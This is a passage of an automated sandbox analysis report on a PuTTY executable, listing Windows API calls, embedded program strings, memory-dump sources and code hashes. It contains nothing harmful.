                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
                      • API String ID: 3015471070-1665001371
                      • Opcode ID: b9bfb3989dc0ab2d47890ac25385cde08b85174cec19ee0b90f6dc49dabb0509
                      • Instruction ID: 2398690ba68d274151f134a350863002b9a54a9b83f4d930887ced8c64ca236a
                      • Opcode Fuzzy Hash: b9bfb3989dc0ab2d47890ac25385cde08b85174cec19ee0b90f6dc49dabb0509
                      • Instruction Fuzzy Hash: 7631AB33A2491591FB608B2AD9087652B91FB94B98F654135CE1C87790DF3CDC55CB08
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: htonlinet_ntoa
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
                      • API String ID: 298042256-529704717
                      • Opcode ID: 438a5ba1e524eaa18862dbd65f4a01b488d93b2803a10fe3e36ee1f8c1a15f2d
                      • Instruction ID: 3ae679579e11239782dc7084f70dc012acb252faaadacdae31e84a5aec12c9a3
                      • Opcode Fuzzy Hash: 438a5ba1e524eaa18862dbd65f4a01b488d93b2803a10fe3e36ee1f8c1a15f2d
                      • Instruction Fuzzy Hash: B321A563B38612A5FE10CB35D880A3A2B90AF58FC5F644135DD0D877D4DE3CE8029B08
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CursorDestroyMessageShowWindow
                      • String ID: %s Exit Confirmation$Are you sure you want to close this session?%s%s
                      • API String ID: 1466741823-1096320758
                      • Opcode ID: 5babf984b154317977c6c952352b068deff14ff01d67093842571732cb045673
                      • Instruction ID: 5416ad00346c302ac95f594f3f0001afecb3c11bbb2fb8b5361a5160474e641e
                      • Opcode Fuzzy Hash: 5babf984b154317977c6c952352b068deff14ff01d67093842571732cb045673
                      • Instruction Fuzzy Hash: 5E218D63E2D54764FA819B31A9853B61F91AF94BD0F744831CC0EC7792EE2CED42A718
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: FileView$CloseHandleUnmap
                      • String ID: %p:%u$Serialised configuration data was invalid
                      • API String ID: 2927507641-1340088990
                      • Opcode ID: 9d57c90434684aaf2965970c8f0240be98aef44ae6faf4afbbb2f39bb53a8b90
                      • Instruction ID: f974b0c3e3e61e1caa71a16ac3e198d9476a62837ecc8558cb592829e6bdd1f9
                      • Opcode Fuzzy Hash: 9d57c90434684aaf2965970c8f0240be98aef44ae6faf4afbbb2f39bb53a8b90
                      • Instruction Fuzzy Hash: 93215332A29A8592FA50DB24F55436B6BA0EF85B80F705135EA8D87B58DF3CDC42CB44
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Caret$Window$BlinkCreateFlashProcShowTime
                      • String ID:
                      • API String ID: 3048652251-3916222277
                      • Opcode ID: 7d8abb54fdfaeffb200c07e0e3071c8cc211ee267e447a3fee1c274b4c34ed4b
                      • Instruction ID: 58351803ce997700527f08b72c9e602e51cc6ac49527d35263955bab4f2abf2b
                      • Opcode Fuzzy Hash: 7d8abb54fdfaeffb200c07e0e3071c8cc211ee267e447a3fee1c274b4c34ed4b
                      • Instruction Fuzzy Hash: 20216933A2D68295F6118B31E8593B62B50BF98B94F200431CE4DC77A5CF3CF985AB48
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorFileLast$CreateDelete
                      • String ID: Unable to delete '%s': %s
                      • API String ID: 3657518308-26304762
                      • Opcode ID: f88e35c732a831ebd537cab3597428dc8e72801e86ae3bdb86b7c1507d9bfd73
                      • Instruction ID: 53ae4ce2c05c7597cd605f2df171e1f0acf28edc84b941c0d9098033822658f8
                      • Opcode Fuzzy Hash: f88e35c732a831ebd537cab3597428dc8e72801e86ae3bdb86b7c1507d9bfd73
                      • Instruction Fuzzy Hash: A011C226B2861352E7546B34A94572F2A929B907B0F344334CD6AC2BD4DF2C8E419708
                      APIs
                      Strings
                      • %s Licence, xrefs: 00007FF6785F49C5
                      • PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso, xrefs: 00007FF6785F49E8
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Text$DialogItemWindow
                      • String ID: %s Licence$PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso
                      • API String ID: 4005798191-2223775202
                      • Opcode ID: fd1f42abe3cd0209208851b7c1641d25dc7e0621b27556c9dd1169b445761683
                      • Instruction ID: 79a01cbcc68966ffb0fc32297be56595919f5ff9fbf92b59ea370bb2830656a6
                      • Opcode Fuzzy Hash: fd1f42abe3cd0209208851b7c1641d25dc7e0621b27556c9dd1169b445761683
                      • Instruction Fuzzy Hash: C8F0D122F2C45661FA945336E9445BA1A829F94BA0FB04031C82DC77D4DE6CEDC29B0C
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      Similarity
                      • API ID: CriticalSection$CloseEnterHandleLeave
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c$h && !h->u.g.moribund
                      • API String ID: 2394387412-2696147314
                      Similarity
                      • API ID: _set_statfp
                      • String ID:
                      • API String ID: 1156100317-0
                      APIs
                      • FlsGetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A32F7
                      • FlsSetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A3316
                      • FlsSetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A333E
                      • FlsSetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A334F
                      • FlsSetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A3360
                      Similarity
                      • API ID: Value
                      • String ID:
                      • API String ID: 3702945584-0
                      APIs
                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A317D
                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A319C
                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A31C4
                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A31D5
                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A31E6
                      Similarity
                      • API ID: Value
                      • String ID:
                      • API String ID: 3702945584-0
                      APIs
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF67867B043
                      Similarity
                      • API ID: AddressProc
                      • String ID: %02x$CryptProtectMemory$crypt32.dll
                      • API String ID: 190572456-4241872374
                      Similarity
                      • API ID: BreakClearCloseCommHandle
                      • String ID: End of file reading from serial device$Error reading from serial device
                      • API String ID: 2685284230-2629609604
                      Similarity
                      • API ID: ClientDesktopInfoMonitorRectWindow
                      • String ID: (
                      • API String ID: 2130016935-3887548279
                      APIs
                        • Part of subcall function 00007FF67869C0A4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67868D346,?,?,?,00007FF67868D367,?,?,?,00007FF67868E81E), ref: 00007FF67869C0CA
                      • GetDC.USER32 ref: 00007FF6785D7A74
                      • SelectPalette.GDI32 ref: 00007FF6785D7A8F
                        • Part of subcall function 00007FF67869B8AC: _set_error_mode.LIBCMT ref: 00007FF67869B8D3
                      Similarity
                      • API ID: FeaturePalettePresentProcessorSelect_set_error_mode
                      • String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c
                      • API String ID: 1342517984-2668247132
                      Similarity
                      • API ID: CommErrorLast$StateTimeouts
                      • String ID: Configuring %s flow control$RTS/CTS
                      • API String ID: 274883806-1158513486
                      Similarity
                      • API ID: CommErrorLast$StateTimeouts
                      • String ID: Configuring %s flow control$DSR/DTR
                      • API String ID: 274883806-321787297
                      Similarity
                      • API ID: CommErrorLast$StateTimeouts
                      • String ID: Configuring %s flow control$XON/XOFF
                      • API String ID: 274883806-924046750
                      Similarity
                      • API ID: CloseCreateHandleThread_set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$clipboard == CLIP_SYSTEM
                      • API String ID: 968033324-2875968380
                      Similarity
                      • API ID: _invalid_parameter_noinfo$_get_daylight
                      • String ID:
                      • API String ID: 72036449-0
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID:
                      • API String ID: 3015471070-0
                      Similarity
                      • API ID: Color
                      • String ID:
                      • API String ID: 2811717613-0
                      • Opcode ID: 217ffbfbbca57e0f98a7bd9ebae0c02fa65dafaf6720f8fc0dea7ed2a10c52aa
                      • Instruction ID: 32d45ca12de53dffa3750b8fd8b451ad6f5bba08d8695267321044c8a1d275de
                      • Opcode Fuzzy Hash: 217ffbfbbca57e0f98a7bd9ebae0c02fa65dafaf6720f8fc0dea7ed2a10c52aa
                      • Instruction Fuzzy Hash: AD31900315C2C146E331D3B9681119B6F51EBE9384F54027AEECD47B8BCD2CCA06CBA9
                      APIs
                      Similarity
                      • API ID: Rect$InvalidateWindow$ClientDestroyProc
                      • String ID:
                      • API String ID: 3789280143-0
                      • Opcode ID: 80ad04d1cd51cbcf71c79e559fe8f0604cac8142e46c7db8df3712c76460e334
                      • Instruction ID: 00f77244df27ce520d5ade70833b796886c6db1ef56da360245439fe69a5ca30
                      • Opcode Fuzzy Hash: 80ad04d1cd51cbcf71c79e559fe8f0604cac8142e46c7db8df3712c76460e334
                      • Instruction Fuzzy Hash: A7319033E2858696F754DB35E8426BA3B90AB98754F204035CD0DC7B96DD3CF985AF08
                      APIs
                      • DeleteObject.GDI32 ref: 00007FF6785D6C21
                      • DestroyIcon.USER32(00000000,00000000,00000000,00007FF6785D6077,?,?,?,?,00007FF67864A920,?,?,?,?,00007FF678613528), ref: 00007FF6785D6C32
                      • DeleteObject.GDI32 ref: 00007FF6785D6C5B
                      • CoUninitialize.OLE32(00000000,00000000,00000000,00007FF6785D6077,?,?,?,?,00007FF67864A920,?,?,?,?,00007FF678613528), ref: 00007FF6785D6C70
                      Similarity
                      • API ID: DeleteObject$DestroyIconUninitialize
                      • String ID:
                      • API String ID: 1128191211-0
                      • Opcode ID: a66b6740aff3e8cf8d15a9e642f8c74887d25acfd22a1c9a1c92b402c24d2bce
                      • Instruction ID: e173e6a12c216ec5010acf85b3decc3c14de2e2a7e3b5e274189af5aa92ba925
                      • Opcode Fuzzy Hash: a66b6740aff3e8cf8d15a9e642f8c74887d25acfd22a1c9a1c92b402c24d2bce
                      • Instruction Fuzzy Hash: DB11A023E28A03A0FB546F70AC842762E50AF14B70F310331D83EC61E1DE2CAC06A75C
                      APIs
                      Strings
                      Similarity
                      • API ID: ErrorFileLastRead
                      • String ID: MZx
                      • API String ID: 1948546556-2575928145
                      • Opcode ID: a9df9c85f04fb2dd16403e166051e429f6c8123a871e395cd67d26eb5e7c112b
                      • Instruction ID: fa153ce1c67917629dd5d4dc4562f516ca209fcff3f31e5156558a29cf9633dc
                      • Opcode Fuzzy Hash: a9df9c85f04fb2dd16403e166051e429f6c8123a871e395cd67d26eb5e7c112b
                      • Instruction Fuzzy Hash: 1091271BB2C6A6A5F7215A34944037E6F81AB52F94F384235CA4EC72D5CE3CDC46E306
                      APIs
                      Strings
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/unicode.c$p - mbstr < mblen
                      • API String ID: 626452242-1134606155
                      • Opcode ID: e1f5720bcf4309deea2da40c1ac1e7931b163e311a1a09669df6bf7a2a865389
                      • Instruction ID: c9db3498cab8fe98b59e0277a550ef950061bb310568761d71295f130662ee8d
                      • Opcode Fuzzy Hash: e1f5720bcf4309deea2da40c1ac1e7931b163e311a1a09669df6bf7a2a865389
                      • Instruction Fuzzy Hash: 6C61C623F3C69665EA208B22A45427BBBA1BF44B95F640035DE4DC7796DE3CE844E708
                      APIs
                      Strings
                      Similarity
                      • API ID: ErrorFileLastWrite
                      • String ID: U
                      • API String ID: 442123175-4171548499
                      • Opcode ID: 0c5543f92d4ffb37be7eaca806808697015f89918511715fcd2ed829bb6a8460
                      • Instruction ID: 7b9c979b324777700dc9947ae2deea6b66b3667c869afa173eee3f4301c381de
                      • Opcode Fuzzy Hash: 0c5543f92d4ffb37be7eaca806808697015f89918511715fcd2ed829bb6a8460
                      • Instruction Fuzzy Hash: 1C41D423B28A51A6EB109F35E4483AA6B60FB98784F504031EF4DC7758EF3CD841D745
                      APIs
                      Strings
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785F9AAE
                      • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF6785F9AA7
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                      • API String ID: 3015471070-2883471717
                      • Opcode ID: 1f8e08e8db5f812005c54b442ea56d0b4140d6f98dd6dbec8a4671db2507f039
                      • Instruction ID: 1612712d83b47e7b14fee34527bd1b6e987a69c4ade0c06cf0d65ca9464e310f
                      • Opcode Fuzzy Hash: 1f8e08e8db5f812005c54b442ea56d0b4140d6f98dd6dbec8a4671db2507f039
                      • Instruction Fuzzy Hash: 2E11DF33B24A2691FBA08B26C9447A93B90BBA5B84F658035CE0D87790DF3DDC41CB08
                      APIs
                      Strings
                      • c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 00007FF6785FA027
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785FA02E
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
                      • API String ID: 3015471070-795294906
                      • Opcode ID: 0b340bb8710d75010c8b75403d4adb33775eefad0a2dc6dcc00247611cc3728a
                      • Instruction ID: 476cf37351d5991f0fe73d4ec2b08dfa0baed3435c4c7a0efd550f23399f05cf
                      • Opcode Fuzzy Hash: 0b340bb8710d75010c8b75403d4adb33775eefad0a2dc6dcc00247611cc3728a
                      • Instruction Fuzzy Hash: 6711A223B25605D9FB618B26EC443B93BA0FB55B99F949035DE0C87794EE3CE885CB04
                      APIs
                      Strings
                      • c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 00007FF6785F9F67
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785F9F6E
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
                      • API String ID: 3015471070-4034055451
                      • Opcode ID: 1324725a9ff61d9b3b6e02095e2f27996e4c3d528beff90453ecb7ce8199f2e5
                      • Instruction ID: a7551f32fc50e5e22fce0e30ff872b88f255afd9ea09ff27d29e6c574bf2f74d
                      • Opcode Fuzzy Hash: 1324725a9ff61d9b3b6e02095e2f27996e4c3d528beff90453ecb7ce8199f2e5
                      • Instruction Fuzzy Hash: 4111AF23B25B05D6FB618B26D8403B97BA0EB54B95F588035DE0C87794EE3CEC84DB04
                      APIs
                      Strings
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX
                      • API String ID: 3015471070-542244468
                      • Opcode ID: 638900d4bbbe74fd839ca0784a1d1c645808873d33638030f784285a59264cf8
                      • Instruction ID: fda95dd252dc8b364a7dedf198d9fded0ae75c59af2bbdafdd56c5f0189bb3b9
                      • Opcode Fuzzy Hash: 638900d4bbbe74fd839ca0784a1d1c645808873d33638030f784285a59264cf8
                      • Instruction Fuzzy Hash: 1611D333725A05CAEB508B26DC403B97B61EB98B99FA48035DE4C87795DE3CD885CB04
                      APIs
                      Strings
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                      • API String ID: 3015471070-587671386
                      • Opcode ID: 367a966b6e37a6fdaa1772d553b07fe266872019545f1052af7bd23f7f29b435
                      • Instruction ID: c863c4bd18d09ceacf0b27c4de19adfc7c8a5c477af89b0e9cd5751013000e00
                      • Opcode Fuzzy Hash: 367a966b6e37a6fdaa1772d553b07fe266872019545f1052af7bd23f7f29b435
                      • Instruction Fuzzy Hash: 9C110633B24A1591FA118B26E9005666B51BBA4FD8FA08031CE0C87395DF3CD886D708
                      APIs
                      Strings
                      Similarity
                      • API ID: BreakClearCloseCommHandle
                      • String ID: Error writing to serial device
                      • API String ID: 2685284230-3232346394
                      • Opcode ID: 7eb12c439e672dc5fa65efc19690cb1d9c5bd28e323bc0a838643cf16d101334
                      • Instruction ID: 0681517d07db7a34f1abd0560747497029a953fb3110214f69383ad98909785e
                      • Opcode Fuzzy Hash: 7eb12c439e672dc5fa65efc19690cb1d9c5bd28e323bc0a838643cf16d101334
                      • Instruction Fuzzy Hash: 5F218A2762564292EA249B36E09437E6760EF94BB0F244231CBAE877E5CF6CE845D344
                      APIs
                      Strings
                      Similarity
                      • API ID: CursorMessageShow
                      • String ID: %s Error
                      • API String ID: 2689832819-1420171443
                      • Opcode ID: 56ba602abdb3264e2971dc15fe112a15410bdf86c2fca282f0e8dd9a99c60566
                      • Instruction ID: 7aa954f3537f8b88dd36e56a1af8ed2ceb2824adb2214417a7946f9297beab83
                      • Opcode Fuzzy Hash: 56ba602abdb3264e2971dc15fe112a15410bdf86c2fca282f0e8dd9a99c60566
                      • Instruction Fuzzy Hash: FC11A322E3C686A0FA409731F88537B2F90AF94BD0F705031DD4D87766DE2CE8429B08
                      APIs
                      • MessageBoxA.USER32 ref: 00007FF6785DCFDC
                        • Part of subcall function 00007FF6785D6BD0: DeleteObject.GDI32 ref: 00007FF6785D6C21
                        • Part of subcall function 00007FF6785D6BD0: DestroyIcon.USER32(00000000,00000000,00000000,00007FF6785D6077,?,?,?,?,00007FF67864A920,?,?,?,?,00007FF678613528), ref: 00007FF6785D6C32
                        • Part of subcall function 00007FF6785D6BD0: DeleteObject.GDI32 ref: 00007FF6785D6C5B
                        • Part of subcall function 00007FF6785D6BD0: CoUninitialize.OLE32(00000000,00000000,00000000,00007FF6785D6077,?,?,?,?,00007FF67864A920,?,?,?,?,00007FF678613528), ref: 00007FF6785D6C70
                      Strings
                      Similarity
                      • API ID: DeleteObject$DestroyIconMessageUninitialize
                      • String ID: %s Internal Error$Unsupported protocol number found
                      • API String ID: 1151367991-184558026
                      • Opcode ID: aaf80368ca53954cd90d1eb702873e0f1aa82ef3957093735d968e88b12884d8
                      • Instruction ID: ac32fc62d22eeba0b2154e2b515ccb06d2ec1f6c27f6432ac25036b9a2e7260f
                      • Opcode Fuzzy Hash: aaf80368ca53954cd90d1eb702873e0f1aa82ef3957093735d968e88b12884d8
                      • Instruction Fuzzy Hash: ECF04912E28507A1FA58A771A44A3FA5A919F44780F340835D90EC67D6EE2CED46A35C
                      APIs
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                      • RegDeleteKeyA.ADVAPI32 ref: 00007FF67860D06B
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860D07B
                      Strings
                      Similarity
                      • API ID: Close$CreateDelete
                      • String ID: Software\SimonTatham\PuTTY\Sessions
                      • API String ID: 3931322244-490553574
                      • Opcode ID: 4b1984fb7c262d7d20289c66f2bcf03e70f15f26a06c3254bc2e2c9ddc0dde6e
                      • Instruction ID: 0f631c0769af7044e52e687dd3a4c29fdbe8036fd3945ba89d5ef74c8c0bc354
                      • Opcode Fuzzy Hash: 4b1984fb7c262d7d20289c66f2bcf03e70f15f26a06c3254bc2e2c9ddc0dde6e
                      • Instruction Fuzzy Hash: 27F09017F3D11220FD16A73666153FB4A411F89BE4E244230ED1E8B7C7EE2CD842A248
                      APIs
